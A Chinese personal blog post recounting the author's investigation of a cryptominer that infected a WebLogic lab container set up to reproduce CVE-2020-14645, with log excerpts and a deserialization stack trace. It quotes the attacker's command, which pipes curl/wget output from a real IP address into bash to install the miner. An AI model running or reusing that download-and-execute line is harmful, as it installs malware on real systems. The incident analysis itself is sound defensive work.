Life has its own fate, and meeting may not be accidental.

0%

恶意的挖矿经历-当场应急!

发表于 更新于   |   字数统计: 923(字)   |   阅读时长: 4(分) Valine:

事情的起因

下班得瑟的我,突然接收到了一条来自阿里云的短信???????

土豆机中了挖矿!!!??????

先说下结果: 看了一堆,啥也没查到,奶奶的那吊毛删的太干净了!

这不是现场的应急教材吗????开冲!!!

前段时间复现CVE-2020-14645,有朋友想玩玩,然后就在我的土豆机上开心的用docker搭建了环境。

靠着我的直觉,直接停了docker,到家后登上阿里云,果然报的就是靶机。现在搞挖矿真不容易,还得拿最近爆出来的漏洞打~~~

从阿里云上看告警监测


http://89.178.232.69:9000/seele地址进行get请求

动态IP没啥可看的

1
2
3
curl
-s
-s参数将不输出错误和进度信息。
1
2
3
4
5
6
/java/bin/java -server -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=8453,server=y,suspend=n 
-Djava.compiler=NONE -Xms256m -Xmx512m -XX:CompileThreshold=8000 -cp /u01/app/oracle/middleware/wlserver/server/lib/weblogic-launcher.jar 
-Dlaunch.use.env.classpath=true -Dweblogic.Name=AdminServer 
-Djava.security.policy=/u01/app/oracle/middleware/wlserver/server/lib/weblogic.policy 
-Djava.system.class.loader=com.oracle.classloader.weblogic.LaunchClassLoader 
-javaagent:/u01/app/oracle/middleware/wlserver/server/lib/debugpatch-agent.jar -ea -da:com.bea... -da:javelin... -da:weblogic... -ea:com.bea.wli... -ea:com.bea.broker... -ea:com.bea.sbconsole... -Dwls.home=/u01/app/oracle/middleware/wlserver/server -Dweblogic.home=/u01/app/oracle/middleware/wlserver/server weblogic.Server

-Xdebug 启动命令
讲的可详细了

父进程id:15015
进程ID:27557

1
/bin/sh -c (curl -s http://89.178.232.69:9000/seele||wget -q -O- http://89.178.232.69:9000/seele)|bash
1
2
3
wget
-q, --quiet 安静模式(没有输出)
-O --output-document=FILE 把文档写到FILE文件中

![发现了挖矿程序](5jpg %}

![访问恶意ip](6jpg %}

![中控ip](6.png %}

日志分析

先查看下weblogic的访问日志

1
oracle/Domains/ExampleSilentWTDomain/servers/AdminServer/logs

![access.log](7.png %}

还顺带发现了几个腾讯云的恶意IP

ExampleSilentWTDomain.log下发现了当天下午四点的攻击(8小时时差)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
####<Aug 7, 2020 8:50:35,581 AM UTC> <Error> <RJVM> <4695b9b44637> <AdminServer> <ExecuteThread: '0' for queue: 'weblogic.socket.Muxer'> <<WLS Kernel>> <> <6e5ae28b-117c-4080-b9d7-25c5070c1882-00000019> <1596790235581> <[severity-value: 8] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000503> <Incoming message header or abbreviation processing failed. 
 java.lang.ClassCastException: java.lang.UNIXProcess cannot be cast to java.lang.Comparable
java.lang.ClassCastException: java.lang.UNIXProcess cannot be cast to java.lang.Comparable
	at com.tangosol.util.comparator.ExtractorComparator.compare(ExtractorComparator.java:71)
	at java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:722)
	at java.util.PriorityQueue.siftDown(PriorityQueue.java:688)
	at java.util.PriorityQueue.heapify(PriorityQueue.java:737)
	at java.util.PriorityQueue.readObject(PriorityQueue.java:797)
	at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
	at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
	at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
	at java.lang.reflect.Method.invoke(Method.java:498)
	at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1170)
	at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2178)
	at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2069)
	at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1573)
	at java.io.ObjectInputStream.readObject(ObjectInputStream.java:431)
	at weblogic.rjvm.InboundMsgAbbrev.readObject(InboundMsgAbbrev.java:73)
	at weblogic.rjvm.InboundMsgAbbrev.read(InboundMsgAbbrev.java:45)
	at weblogic.rjvm.MsgAbbrevJVMConnection.readMsgAbbrevs(MsgAbbrevJVMConnection.java:325)
	at weblogic.rjvm.MsgAbbrevInputStream.init(MsgAbbrevInputStream.java:219)
	at weblogic.rjvm.MsgAbbrevJVMConnection.dispatch(MsgAbbrevJVMConnection.java:557)
	at weblogic.rjvm.t3.MuxableSocketT3.dispatch(MuxableSocketT3.java:666)
	at weblogic.socket.BaseAbstractMuxableSocket.dispatch(BaseAbstractMuxableSocket.java:397)
	at weblogic.socket.SocketMuxer.readReadySocketOnce(SocketMuxer.java:993)
	at weblogic.socket.SocketMuxer.readReadySocket(SocketMuxer.java:929)
	at weblogic.socket.NIOSocketMuxer.process(NIOSocketMuxer.java:599)
	at weblogic.socket.NIOSocketMuxer.processSockets(NIOSocketMuxer.java:563)
	at weblogic.socket.SocketReaderRequest.run(SocketReaderRequest.java:30)
	at weblogic.socket.SocketReaderRequest.execute(SocketReaderRequest.java:43)
	at weblogic.kernel.ExecuteThread.execute(ExecuteThread.java:147)
	at weblogic.kernel.ExecuteThread.run(ExecuteThread.java:119)
>

历史记录被删除了,感觉好多数据都被删除了。

发现登陆记录被删除了

果然重要信息都被清除掉了,太现实了~

![ /var/log](11jpg %}

来缕一缕思路

手先通过扫描,发现我的靶机存在漏洞。

![事件调查](7jpg %}

通过curl 和wget 投递挖矿程序->访问恶意ip执行了挖矿程序->脚本传入了挖矿程序后,运行后顺便把记录删了。